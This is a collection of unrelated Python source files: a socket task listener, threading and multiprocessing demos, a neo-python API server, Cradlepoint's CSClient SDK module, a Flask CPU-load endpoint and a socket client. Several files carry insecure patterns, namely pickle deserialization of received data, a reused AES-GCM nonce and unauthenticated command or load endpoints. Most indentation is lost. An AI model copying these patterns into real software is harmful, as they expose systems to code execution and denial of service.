logger.info("[thread-%s]: Kill task message received! (taskid:%s)",
threadnum, taskid)
# do something here to kill task (future)
message = b'{"msg": "taskkilled"}\n'
clientsock.send(message)
return
else:
logger.warning("Unknown action")
message = b'{"error": "unknown action"}\n'
clientsock.send(message)
return
# add adaptive batch
if (adaptivebatch == "True" or adaptivebatch == "true"):
cmd.append('-a')
# run command using subprocess
starttime = time.time()
taskid = str(uuid.uuid4()).encode('utf-8')
# start process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# add process to socket_tasks dict
socket_tasks[taskid] = process
message = b'{"msg": "taskstart", "taskid": "' + taskid + b'"}\n'
clientsock.send(message)
logger.info("[thread-%s]: Running command (taskid:%s)",
threadnum, taskid.decode('utf-8'))
logger.info(cmd)
output, error = process.communicate()
# send exit msg to client
exitcode = str(process.returncode).encode('utf-8')
logger.debug('Command output:')
logger.debug(output.decode('utf-8'))
logger.debug('Command error:')
logger.debug(error.decode('utf-8'))
elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')
logger.info("Finished command (taskid:%s), exit code: %s, elapsed time: %s"
% (taskid.decode('utf-8'), exitcode.decode('utf-8'), elapsedtime.decode('utf-8')))
message = b'{"msg": "taskfinish", "taskid": "%s", "exitcode": %s, "elapsedtime": "%s"}\n' \
% (taskid, exitcode, elapsedtime)
clientsock.send(message)
except ValueError:
logger.warning("Value error")
message = b'{"error": "value error"}\n'
clientsock.send(message)
pass
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
pass
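
# Hedged usage sketch (illustrative only, never called here): a minimal client for the
# listener above can send one of the JSON commands handled by run_command() over TCP.
# The path and index values are placeholders.
def example_send_command(host='localhost', port=9999):
    # 'action', 'path' and 'index' mirror the keys run_command() reads from command_dict
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.sendall(json.dumps({'action': 'crawl', 'path': '/data', 'index': 'diskover-test'}).encode())
    reply = s.recv(1024).decode()  # expect a {"msg": "taskstart", ...} response first
    s.close()
    return reply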
|
wait_blocking.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Test module to implement wait blocking to address race condition, using
threading.Condition and threading.Event.
"""
__author__ = 'Ziang Lu'
import time
from threading import Condition, Event, Thread, current_thread
# Condition
product = None  # the shared product
condition = Condition()
def producer() -> None:
while True:
if condition.acquire():
global product
if not product:
                # Produce the product
print('Producing something...')
product = 'anything'
condition.notify()
condition.wait()
time.sleep(2)
def consumer() -> None:
while True:
if condition.acquire():
global product
if product:
                # Consume the product
print('Consuming something...')
product = None
condition.notify()
condition.wait()
time.sleep(2)
prod_thread = Thread(target=producer)
cons_thread = Thread(target=consumer)
prod_thread.start()
cons_thread.start()
# Output:
# Producing something...
# Consuming something...
# Producing something...
# Consuming something...
# ...
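
# The module docstring also mentions threading.Event; a minimal sketch of the same
# hand-off using an Event is added below for comparison (illustrative only, these
# functions are defined but intentionally never started here).
ready = Event()

def producer_ev() -> None:
    global product
    print('Producing something...')
    product = 'anything'
    ready.set()  # wake up the waiting consumer

def consumer_ev() -> None:
    global product
    ready.wait()  # block until the producer signals
    print('Consuming something...')
    product = None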
|
api-server.py
|
#!/usr/bin/env python3
"""
This api server runs one or both of the json-rpc and rest api. Uses
neo.api.JSONRPC.JsonRpcApi and neo.api.REST.NotificationRestApi
See also:
* Tutorial on setting up an api server: https://gist.github.com/metachris/2be27cdff9503ebe7db1c27bfc60e435
* Example systemd service config: https://gist.github.com/metachris/03d1cc47df7cddfbc4009d5249bdfc6c
* JSON-RPC api issues: https://github.com/CityOfZion/neo-python/issues/273
"""
import os
import argparse
import threading
from time import sleep
from logzero import logger
from twisted.internet import reactor, task, endpoints
from twisted.web.server import Site
from klein import Klein
from neo import __version__
from neo.Core.Blockchain import Blockchain
from neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain
from neo.Implementations.Notifications.LevelDB.NotificationDB import NotificationDB
from neo.api.JSONRPC.JsonRpcApi import JsonRpcApi
from neo.api.REST.NotificationRestApi import NotificationRestApi
from neo.Network.NodeLeader import NodeLeader
from neo.Settings import settings, DIR_PROJECT_ROOT
from neo.UserPreferences import preferences
# Logfile settings & setup
LOGFILE_FN = os.path.join(DIR_PROJECT_ROOT, 'api-server.log')
LOGFILE_MAX_BYTES = 5e7 # 50 MB
LOGFILE_BACKUP_COUNT = 3 # 3 logfiles history
settings.set_logfile(LOGFILE_FN, LOGFILE_MAX_BYTES, LOGFILE_BACKUP_COUNT)
# Set the PID file
PID_FILE = "/tmp/neopython-api-server.pid"
def write_pid_file():
""" Write a pid file, to easily kill the service """
f = open(PID_FILE, "w")
f.write(str(os.getpid()))
f.close()
def custom_background_code():
""" Custom code run in a background thread.
This function is run in a daemonized thread, which means it can be instantly killed at any
moment, whenever the main thread quits. If you need more safety, don't use a daemonized
thread and handle exiting this thread in another way (eg. with signals and events).
"""
while True:
logger.info("[%s] Block %s / %s", settings.net_name, str(Blockchain.Default().Height), str(Blockchain.Default().HeaderHeight))
sleep(15)
def main():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-m", "--mainnet", action="store_true", default=False,
help="Use MainNet instead of the default TestNet")
group.add_argument("-t", "--testnet", action="store_true", default=False,
help="Use TestNet instead of the default TestNet")
group.add_argument("-p", "--privnet", action="store_true", default=False,
help="Use PrivNet instead of the default TestNet")
group.add_argument("--coznet", action="store_true", default=False,
help="Use the CoZ network instead of the default TestNet")
group.add_argument("-c", "--config", action="store", help="Use a specific config file")
parser.add_argument("--port-rpc", type=int, help="port to use for the json-rpc api (eg. 10332)")
parser.add_argument("--port-rest", type=int, help="port to use for the rest api (eg. 80)")
args = parser.parse_args()
if not args.port_rpc and not args.port_rest:
print("Error: specify at least one of --port-rpc / --port-rest")
parser.print_help()
return
if args.port_rpc == args.port_rest:
print("Error: --port-rpc and --port-rest cannot be the same")
parser.print_help()
return
# Setup depending on command line arguments. By default, the testnet settings are already loaded.
if args.config:
settings.setup(args.config)
elif args.mainnet:
settings.setup_mainnet()
elif args.testnet:
settings.setup_testnet()
elif args.privnet:
settings.setup_privnet()
elif args.coznet:
settings.setup_coznet()
# Write a PID file to easily quit the service
write_pid_file()
# Instantiate the blockchain and subscribe to notifications
blockchain = LevelDBBlockchain(settings.LEVELDB_PATH)
Blockchain.RegisterBlockchain(blockchain)
dbloop = task.LoopingCall(Blockchain.Default().PersistBlocks)
dbloop.start(.1)
# Disable logging smart contract events
settings.set_log_smart_contract_events(False)
# Start the notification db instance
ndb = NotificationDB.instance()
ndb.start()
# Start a thread with custom code
d = threading.Thread(target=custom_background_code)
d.setDaemon(True) # daemonizing the thread will kill it when the main thread is quit
d.start()
# Run
reactor.suggestThreadPoolSize(15)
NodeLeader.Instance().Start()
host = "0.0.0.0"
if args.port_rpc:
logger.info("Starting json-rpc api server on http://%s:%s" % (host, args.port_rpc))
api_server_rpc = JsonRpcApi(args.port_rpc)
endpoint_rpc = "tcp:port={0}:interface={1}".format(args.port_rpc, host)
endpoints.serverFromString(reactor, endpoint_rpc).listen(Site(api_server_rpc.app.resource()))
if args.port_rest:
logger.info("Starting notification api server on http://%s:%s" % (host, args.port_rest))
api_server_rest = NotificationRestApi()
endpoint_rest = "tcp:port={0}:interface={1}".format(args.port_rest, host)
endpoints.serverFromString(reactor, endpoint_rest).listen(Site(api_server_rest.app.resource()))
app = Klein()
app.run(host, 9999)
if __name__ == "__main__":
main()
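
# Hedged usage note (not from the original script): once the JSON-RPC endpoint is up it
# can be exercised with a standard NEO JSON-RPC request, for example:
#
#   curl -X POST http://127.0.0.1:10332 \
#        -d '{"jsonrpc": "2.0", "method": "getblockcount", "params": [], "id": 1}'
#
# The port must match --port-rpc; "getblockcount" is assumed here to be among the
# methods served by neo.api.JSONRPC.JsonRpcApi.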
|
csclient.py
|
"""
NCOS communication module for SDK applications.
Copyright (c) 2018 Cradlepoint, Inc. <www.cradlepoint.com>. All rights reserved.
This file contains confidential information of CradlePoint, Inc. and your use of
this file is subject to the CradlePoint Software License Agreement distributed with
this file. Unauthorized reproduction or distribution of this file is subject to civil and
criminal penalties.
"""
import json
import os
import re
import select
import socket
import threading
import logging.handlers
import signal
import sys
try:
import traceback
except ImportError:
traceback = None
class SdkCSException(Exception):
pass
class CSClient(object):
"""
The CSClient class is the NCOS SDK mechanism for communication between apps and the router tree/config store.
Instances of this class communicate with the router using either an explicit socket or with http method calls.
Apps running locally on the router use a socket on the router to send commands from the app to the router tree
and to receive data (JSON) from the router tree.
Apps running remotely use the requests library to send HTTP method calls to the router and to receive data from
    the router tree. This allows one to use an IDE to run and debug the application on a computer, although
    there are limitations with respect to device hardware access (i.e. serial, USB, etc.).
"""
END_OF_HEADER = b"\r\n\r\n"
    STATUS_HEADER_RE = re.compile(rb"status: \w*")
    CONTENT_LENGTH_HEADER_RE = re.compile(rb"content-length: \w*")
MAX_PACKET_SIZE = 8192
RECV_TIMEOUT = 2.0
_instances = {}
@classmethod
def is_initialized(cls):
return cls in cls._instances
def __new__(cls, *na, **kwna):
""" Singleton factory (with subclassing support) """
if not cls.is_initialized():
cls._instances[cls] = super().__new__(cls)
return cls._instances[cls]
def __init__(self, app_name, init=False):
self.app_name = app_name
handlers = [logging.StreamHandler()]
if sys.platform == 'linux2':
handlers.append(logging.handlers.SysLogHandler(address='/dev/log'))
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)s: %(message)s', datefmt='%b %d %H:%M:%S',
handlers=handlers)
self.logger = logging.getLogger(app_name)
if not init:
return
def get(self, base, query='', tree=0):
"""
Constructs and sends a get request to retrieve specified data from a device.
The behavior of this method is contextual:
- If the app is installed on (and executed from) a device, it directly queries the router tree to retrieve the
specified data.
        - If the app is running remotely on a computer, it calls the HTTP GET method to retrieve the specified data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
query: Not required.
tree: Not required.
Returns:
            A dictionary containing the response (e.g. {"success": True, "data": {}}).
"""
if sys.platform == 'linux2':
cmd = "get\n{}\n{}\n{}\n".format(base, query, tree)
return self._dispatch(cmd).get('data')
else:
# Running in a computer so use http to send the get to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.get(device_api, auth=self._get_auth(device_ip, username, password))
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text).get('data')
def put(self, base, value='', query='', tree=0):
"""
Constructs and sends a put request to update or add specified data to the device router tree.
The behavior of this method is contextual:
        - If the app is installed on (and executed from) a device, it directly updates or adds the specified data to
the router tree.
        - If the app is running remotely on a computer, it calls the HTTP PUT method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
tree: Not required.
Returns:
            A dictionary containing the response (e.g. {"success": True, "data": {}}).
"""
value = json.dumps(value, ensure_ascii=False)
if sys.platform == 'linux2':
cmd = "put\n{}\n{}\n{}\n{}\n".format(base, query, tree, value)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the put to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.put(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def post(self, base, value='', query=''):
"""
Constructs and sends a post request to update or add specified data to the device router tree.
The behavior of this method is contextual:
        - If the app is installed on (and executed from) a device, it directly updates or adds the specified data to
the router tree.
        - If the app is running remotely on a computer, it calls the HTTP POST method to update or add the specified
data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
value: Not required.
query: Not required.
Returns:
            A dictionary containing the response (e.g. {"success": True, "data": {}}).
"""
value = json.dumps(value)
if sys.platform == 'linux2':
cmd = f"post\n{base}\n{query}\n{value}\n"
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the post to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
response = requests.post(device_api,
headers={"Content-Type": "application/x-www-form-urlencoded"},
auth=self._get_auth(device_ip, username, password),
data={"data": '{}'.format(value)})
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def delete(self, base, query=''):
"""
Constructs and sends a delete request to delete specified data to the device router tree.
The behavior of this method is contextual:
        - If the app is installed on (and executed from) a device, it directly deletes the specified data from
        the router tree.
        - If the app is running remotely on a computer, it calls the HTTP DELETE method to delete the specified
        data.
Args:
base: String representing a path to a resource on a router tree,
(i.e. '/config/system/logging/level').
query: Not required.
Returns:
            A dictionary containing the response (e.g. {"success": True, "data": {}}).
"""
if sys.platform == 'linux2':
cmd = "delete\n{}\n{}\n".format(base, query)
return self._dispatch(cmd)
else:
# Running in a computer so use http to send the delete to the device.
import requests
device_ip, username, password = self._get_device_access_info()
device_api = 'http://{}/api/{}/{}'.format(device_ip, base, query)
try:
                # delete() has no value argument, so no request body is sent
                response = requests.delete(device_api,
                                           headers={"Content-Type": "application/x-www-form-urlencoded"},
                                           auth=self._get_auth(device_ip, username, password))
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
print("Timeout: device at {} did not respond.".format(device_ip))
return None
return json.loads(response.text)
def alert(self, value=''):
"""
Constructs and sends a custom alert to NCM for the device. Apps calling this method must be running
on the target device to send the alert. If invoked while running on a computer, then only a log is output.
Args:
app_name: String name of your application.
value: String to displayed for the alert.
Returns:
Success: None
Failure: An error
"""
if sys.platform == 'linux2':
cmd = "alert\n{}\n{}\n".format(self.app_name, value)
return self._dispatch(cmd)
else:
# Running in a computer and can't actually send the alert.
print('Alert is only available when running the app in NCOS.')
print('Alert Text: {}'.format(value))
def log(self, value=''):
"""
Adds an INFO log to the device SYSLOG.
Args:
value: String text for the log.
Returns:
None
"""
if sys.platform == 'linux2':
self.logger.info(value)
else:
# Running in a computer so just use print for the log.
print(value)
def _get_auth(self, device_ip, username, password):
# This is only needed when the app is running in a computer.
# Returns the proper HTTP Auth for the global username and password.
# Digest Auth is used for NCOS 6.4 and below while Basic Auth is
# used for NCOS 6.5 and up.
import requests
from http import HTTPStatus
use_basic = False
device_api = 'http://{}/api/status/product_info'.format(device_ip)
try:
response = requests.get(device_api, auth=requests.auth.HTTPBasicAuth(username, password))
if response.status_code == HTTPStatus.OK:
use_basic = True
except:
use_basic = False
if use_basic:
return requests.auth.HTTPBasicAuth(username, password)
else:
return requests.auth.HTTPDigestAuth(username, password)
@staticmethod
def _get_device_access_info():
# Should only be called when running in a computer. It will return the
# dev_client_ip, dev_client_username, and dev_client_password as defined in
# the sdk section of the sdk_settings.ini file.
device_ip = ''
device_username = ''
device_password = ''
if sys.platform != 'linux2':
import os
import configparser
settings_file = os.path.join(os.path.dirname(os.getcwd()), 'sdk_settings.ini')
config = configparser.ConfigParser()
config.read(settings_file)
# Keys in sdk_settings.ini
sdk_key = 'sdk'
ip_key = 'dev_client_ip'
username_key = 'dev_client_username'
password_key = 'dev_client_password'
if sdk_key in config:
if ip_key in config[sdk_key]:
device_ip = config[sdk_key][ip_key]
else:
print('ERROR 1: The {} key does not exist in {}'.format(ip_key, settings_file))
if username_key in config[sdk_key]:
device_username = config[sdk_key][username_key]
else:
print('ERROR 2: The {} key does not exist in {}'.format(username_key, settings_file))
if password_key in config[sdk_key]:
device_password = config[sdk_key][password_key]
else:
print('ERROR 3: The {} key does not exist in {}'.format(password_key, settings_file))
else:
print('ERROR 4: The {} section does not exist in {}'.format(sdk_key, settings_file))
return device_ip, device_username, device_password
def _safe_dispatch(self, cmd):
"""Send the command and return the response."""
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
sock.connect('/var/tmp/cs.sock')
sock.sendall(bytes(cmd, 'utf-8'))
return self._receive(sock)
def _dispatch(self, cmd):
errmsg = None
result = ""
try:
result = self._safe_dispatch(cmd)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "dispatch failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
            self.log(errmsg)
pass
return result
def _safe_receive(self, sock):
sock.settimeout(self.RECV_TIMEOUT)
data = b""
eoh = -1
while eoh < 0:
# In the event that the config store times out in returning data, lib returns
# an empty result. Then again, if the config store hangs for 2+ seconds,
# the app's behavior is the least of our worries.
try:
buf = sock.recv(self.MAX_PACKET_SIZE)
except socket.timeout:
return {"status": "timeout", "data": None}
if len(buf) == 0:
break
data += buf
eoh = data.find(self.END_OF_HEADER)
status_hdr = self.STATUS_HEADER_RE.search(data).group(0)[8:]
content_len = self.CONTENT_LENGTH_HEADER_RE.search(data).group(0)[16:]
remaining = int(content_len) - (len(data) - eoh - len(self.END_OF_HEADER))
# body sent from csevent_xxx.sock will have id, action, path, & cfg
while remaining > 0:
buf = sock.recv(self.MAX_PACKET_SIZE) # TODO: This will hang things as well.
if len(buf) == 0:
break
data += buf
remaining -= len(buf)
body = data[eoh:].decode()
try:
result = json.loads(body)
except json.JSONDecodeError as e:
# config store receiver doesn't give back
# proper json for 'put' ops, body
# contains verbose error message
# so putting the error msg in result
result = body.strip()
return {"status": status_hdr.decode(), "data": result}
def _receive(self, sock):
errmsg = None
result = ""
try:
result = self._safe_receive(sock)
except Exception as err:
# ignore the command error, continue on to next command
errmsg = "_receive failed with exception={} err={}".format(type(err), str(err))
if errmsg is not None:
            self.log(errmsg)
return result
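
# Hedged usage sketch (illustrative; the app name and config path are examples taken from
# the docstrings above, not a prescription): on a development computer these calls go
# over HTTP using the credentials in sdk_settings.ini, while on the router they go
# through the local config-store socket.
def example_csclient_usage():
    cs = CSClient('example_app')
    level = cs.get('/config/system/logging/level')
    cs.log('current logging level: {}'.format(level))
    cs.put('/config/system/logging/level', 'debug')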
class EventingCSClient(CSClient):
running = False
registry = {}
eids = 1
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.on = self.register
self.un = self.unregister
def start(self):
if self.running:
self.log(f"Eventing Config Store {self.pid} already running")
return
self.running = True
self.pid = os.getpid()
self.f = '/var/tmp/csevent_%d.sock' % self.pid
try:
os.unlink(self.f)
except FileNotFoundError:
pass
self.event_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.event_sock.bind(self.f)
self.event_sock.listen() # backlog is optional. already set on value found in /proc
self.event_sock.setblocking(False)
self.eloop = threading.Thread(target=self._handle_events)
self.eloop.start()
def stop(self):
if not self.running:
return
self.log(f"Stopping {self.app_name}")
for k in list(self.registry.keys()):
self.unregister(k)
self.event_sock.close()
os.unlink(self.f)
self.running = False
def _handle_events(self):
poller = select.poll()
poller.register(self.event_sock,
                        select.POLLIN | select.POLLERR | select.POLLHUP)  # NOTE: this registration is never unregistered during cleanup
while self.running:
try:
events = poller.poll(1000)
for f, ev in events:
if ev & (select.POLLERR | select.POLLHUP):
self.log("Hangup/error received. Stopping")
self.stop() # TODO: restart w/ cached registrations. Will no longer be an error case
if ev & select.POLLIN:
conn, addr = self.event_sock.accept()
result = self._receive(conn)
eid = int(result['data']['id'])
try:
cb = self.registry[eid]['cb']
args = self.registry[eid]['args']
try:
# PUTting just a string to config store results in a json encoded string returned.
# e.g. set /config/system/logging/level "debug", result['data']['cfg'] is '"debug"'
cfg = json.loads(result['data']['cfg'])
except TypeError as e:
# Non-string path
cfg = result['data']['cfg']
try:
cb_return = cb(result['data']['path'], cfg, args)
except:
if traceback:
traceback.print_exc()
self.log(f"Exception during callback for {str(self.registry[eid])}")
if result['data']['action'] == 'get': # We've something to send back.
# config_store_receiver expects json
cb_return = json.JSONEncoder().encode(cb_return)
conn.sendall(
cb_return.encode()) # No dispatch. Config store receiver will put to config store.
except (NameError, ValueError) as e:
self.log(f"Could not find register data for eid {eid}")
except OSError as e:
self.log(f"OSError: {e}")
raise
def register(self, action: object, path: object, callback: object, *args: object) -> object:
if not self.running:
self.start()
# what about multiple registration?
eid = self.eids
self.eids += 1
self.registry[eid] = {'cb': callback, 'action': action, 'path': path, 'args': args}
cmd = "register\n{}\n{}\n{}\n{}\n".format(self.pid, eid, action, path)
return self._dispatch(cmd)
def unregister(self, eid):
ret = ""
try:
e = self.registry[eid]
except KeyError:
pass
else:
if self.running:
cmd = "unregister\n{}\n{}\n{}\n{}\n".format(self.pid, eid, e['action'], e['path'])
ret = self._dispatch(cmd)
del self.registry[eid]
return ret
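
# Hedged sketch (illustrative; the action and path strings are examples only): registering
# a callback for config-store change events with EventingCSClient. The callback receives
# (path, cfg, args), matching what _handle_events() passes above.
def example_eventing_usage():
    ecs = EventingCSClient('example_app')

    def on_change(path, cfg, args):
        ecs.log('{} changed to {!r}'.format(path, cfg))

    ecs.on('put', '/config/system/logging/level', on_change)
    return ecs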
def clean_up_reg(signal, frame):
"""
When 'cppython remote_port_forward.py' gets a SIGTERM, config_store_receiver.py doesn't
clean up registrations. Even if it did, the comm module can't rely on an external service
to clean up.
"""
EventingCSClient('CSClient').stop()
sys.exit(0)
signal.signal(signal.SIGTERM, clean_up_reg)
|
multiprocessing_terminate.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2009 Doug Hellmann All rights reserved.
#
"""
"""
#end_pymotw_header
import multiprocessing
import time
def slow_worker():
print('Starting worker')
time.sleep(0.1)
print('Finished worker')
if __name__ == '__main__':
p = multiprocessing.Process(target=slow_worker)
print('BEFORE:', p, p.is_alive())
p.start()
print('DURING:', p, p.is_alive())
p.terminate()
print('TERMINATED:', p, p.is_alive())
p.join()
print('JOINED:', p, p.is_alive())
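
# Note added for clarity (not in the original example): terminate() only sends SIGTERM and
# returns immediately, so the TERMINATED line may still report is_alive() == True; the
# child is only reliably reaped after join(), at which point is_alive() is False and
# p.exitcode is the negative signal number (-15 on Unix).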
|
app.py
|
from flask import Flask, request
from math import factorial
from threading import Thread
import signal
import time
# This class generates load by running math.factorial() over a period of time
class Load:
should_stop = False
def stop(self):
        self.should_stop = True
def run(self, cpu_usage: float, seconds: float):
if cpu_usage > 1.0:
print('CPU usage cannot be above 100%!')
else:
start_time = time.time()
while not self.should_stop:
cycle_time = time.time()
if cycle_time - start_time >= seconds:
self.should_stop = True
while time.time() - cycle_time < cpu_usage:
factorial(100)
time.sleep(1.0 - cpu_usage)
self.should_stop = False
app = Flask(__name__)
load = Load()
# Endpoint to generate load
@app.route('/killme')
def killme():
cpu_usage = float(request.args.get('usage', 0.8))
length = float(request.args.get('time', 30))
thread = Thread(target=load.run, args=(cpu_usage, length,))
thread.daemon = True
thread.start()
return f'Creating CPU load of {cpu_usage * 100.0}% for {length} seconds in the background'
if __name__ == '__main__':
app.run(host='0.0.0.0')
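
# Hedged usage note (not part of the original app): with Flask's default port, the
# endpoint above can be triggered with, for example:
#
#   curl 'http://localhost:5000/killme?usage=0.5&time=10'
#
# which busy-loops factorial(100) for roughly 50% of each second for 10 seconds in a
# background daemon thread.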
|
Sclient_py.py
|
import os
import socket
import base64
import pickle
import threading
import multiprocessing
import hashlib
import random
import yaml
import datetime
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import load_ssh_public_key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
class IPNC():
def __init__(self):
pass
def read_yml(self,file = None):
with open(file) as file:
documents = yaml.full_load(file)
return documents
def write_yml(self,file = None, dict_data = None,mode = "a+"):
with open(file, mode) as file:
yaml.dump(dict_data, file)
def add_node(self,file = None, node = None):
try:
read = self.read_yml(file)
if read != None:
read[node[0]]
self.change_node_value(file,node)
else:
raise KeyError
except KeyError:
node_dict = {
node[0] : node[1]
}
self.write_yml(file, node_dict)
def change_node_value(self,file = None, node = None):
r_yml = self.read_yml(file)
r_yml[node[0]] = node[1]
self.write_yml(file = file, dict_data = r_yml, mode = "w")
def get_node(self,file = None, key = None, wait = True):
# print(key)
if key == None:
return self.read_yml(file)
if wait:
while True:
r_yml = self.read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
# print("key not found")
pass
except TypeError:
pass
else:
r_yml = self.read_yml(file)
try:
value = r_yml[key]
return value
except KeyError:
# print("key not found")
return None
except TypeError:
pass
def remove_node(self,file,node):
try:
r_yml = self.read_yml(file = file)
r_yml[node]
r_yml.pop(node)
self.write_yml(file = file, dict_data = r_yml, mode = "w")
except KeyError:
print("key not found")
#pass
except:
pass
def name_generator(self,_len_ = 16, onlyText = False):
lower_case = list("abcdefghijklmnopqrstuvwxyz")
upper_case = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
special = list("!@#$%&*?")
number = list("0123456789")
if onlyText:
_all_ = lower_case + upper_case
else:
_all_ = lower_case + upper_case + special + number
random.shuffle(_all_)
return "".join(random.sample(_all_,_len_))
def code001_AN(self,file = None, key = None ,target_key = None, value = None, first_time = False):
read = self.get_node(
file = file,
key = key,
wait = False
)
if read is not None:
read[target_key] = value
self.add_node(
file = file,
node = [
key,
read
]
)
else:
self.add_node(
file = file,
node = [
key,
{target_key : value}
]
)
def code001_UN(self,file = None, key = None, target_key = None, position : int = None, value = None):
read = self.get_node(
file = file,
key = key,
wait = False
)
if read is not None:
if position == None:
read[target_key] = value
else:
base = read[target_key]
base.pop(position)
base.insert(position,value)
read[target_key] = base
self.add_node(
file = file,
node = [
key,
read
]
)
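
# Hedged usage sketch for the YAML node helpers above (the file name, key and value are
# illustrative placeholders only).
def example_ipnc_usage():
    store = IPNC()
    store.add_node(file='state.yml', node=['host', '127.0.0.1'])
    value = store.get_node(file='state.yml', key='host', wait=False)  # -> '127.0.0.1'
    store.remove_node('state.yml', 'host')
    return value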
class DspError(Exception):
def __init__(self,err_msg):
print(err_msg)
class Main(IPNC):
def __init__(self,client_name : str = None, file : str = None, debug : bool = False, rememberServer = True, MPCL : bool = False, MTCL : bool = True):
IPNC.__init__(self)
self.__debug = debug
if not file:
raise TypeError("__init__() missing 1 required positional argument: 'file'")
else:
self.__file_location = file
# self.__client_name = hashlib.sha256(bytes(client_name,"utf-8")).digest()
self.__client_name = client_name
if MPCL and MTCL:
raise ValueError("both 'MPCL' abd 'MTCL' should not be set to True")
elif not MPCL and not MTCL:
raise ValueError("both 'MPCL' abd 'MTCL' should not be set to False")
else:
self.__MPCL = MPCL
self.__MTCL = MTCL
self.__CUSTOM_CHANNEL = []
self.__MESSAGE_HANDLER = []
self.__CALLBACK_LOOP = []
self.__SENDER_QUEUE = []
self.HS_Devices = []
self.__KEY_STORE ={}
if rememberServer:
__get = self.get_node(file = self.__file_location,key = hashlib.sha256(bytes("__VARIFIED", "utf-8")).digest(), wait = False)
if __get == None:
self.add_node(
file=self.__file_location,
node=[
hashlib.sha256(bytes("__VARIFIED", "utf-8")).digest(),
pickle.dumps(False)
]
)
__code003_hs_key = self.get_node(
file = self.__file_location,
key = "key",
wait = False
)
if __code003_hs_key is not None:
# print(f"__code003_hs_key : {__code003_hs_key}")
self.__KEY_STORE = __code003_hs_key
self.HS_Devices = [k for (k,v) in __code003_hs_key.items() if v[0] == "varified"]
__code001_key = self.get_node(
file = self.__file_location,
key = "code_001_srt_key",
wait = False
)
if __code001_key is not None:
if __code001_key["status"] == "varified":
self.__KEY_STORE["code_001_srt_key"] = __code001_key["key"]
self.__CUSTOM_CHANNEL.append("DSP_MSG")
self.__VARIFIED = self.get_node(
file = self.__file_location,
key = hashlib.sha256(bytes("__VARIFIED", "utf-8")).digest(),
wait = False
)
self.__VARIFIED = pickle.loads(self.__VARIFIED)
def __load_object(self, data = None, secure : bool = True, key_dict : bytes = None):
if not data:
raise TypeError("__load_object() missing one positional argument 'data'")
if secure:
if not key_dict:
raise TypeError("__load_object() missing one positional argument 'key_dict', it is compulsory when secure is set to True")
else:
pass
loaded = pickle.loads(base64.b64decode(data))
if loaded["secure"] and secure:
key_pack = pickle.loads(base64.b64decode(key_dict["code_001_srt_key"]))
aes_gcm = AESGCM(key_pack["aes_key"])
decryptedtext = aes_gcm.decrypt(
nonce = key_pack["nonce"],
data = loaded["data"],
associated_data = key_pack["aad"]
)
unflatted = pickle.loads(base64.b64decode(decryptedtext))
return unflatted
elif not secure and not loaded["secure"]:
unflatted = pickle.loads(base64.b64decode(loaded["data"]))
return unflatted
def __serializer(self, object = None, secure : bool = True, key_dict : bytes = None):
if not object:
raise TypeError("__load_object() missing one positional argument 'data'")
else:
if type(object) != type({1:"a"}):
raise TypeError(f"__serializer() 'object' argument should be of type {type({'a':1})}")
if secure:
if not key_dict:
raise TypeError("__load_object() missing one positional argument 'key_dict', it is compulsory when secure is set to True")
# target = object["target_name"]
normalize = base64.b64encode(pickle.dumps(object))
if secure:
key_pack = pickle.loads(base64.b64decode(key_dict["code_001_srt_key"]))
aes_gcm = AESGCM(key_pack["aes_key"])
cyphertext = aes_gcm.encrypt(
nonce = key_pack["nonce"],
data = normalize,
associated_data = key_pack["aad"]
)
prepare_serialized_data = {"secure" : secure, "sender_name" : self.__client_name, "data" : cyphertext}
flatten_psd = base64.b64encode(pickle.dumps(prepare_serialized_data))
return flatten_psd
else:
prepare_serialized_data = {"secure" : secure, "sender_name" : self.__client_name, "data" : normalize}
flatten_psd = base64.b64encode(pickle.dumps(prepare_serialized_data))
return flatten_psd
def CLIENT(self,address : str = None, port : int = None,timeout : int = 1):
if self.__debug:
print("[Connecting TO Server]")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
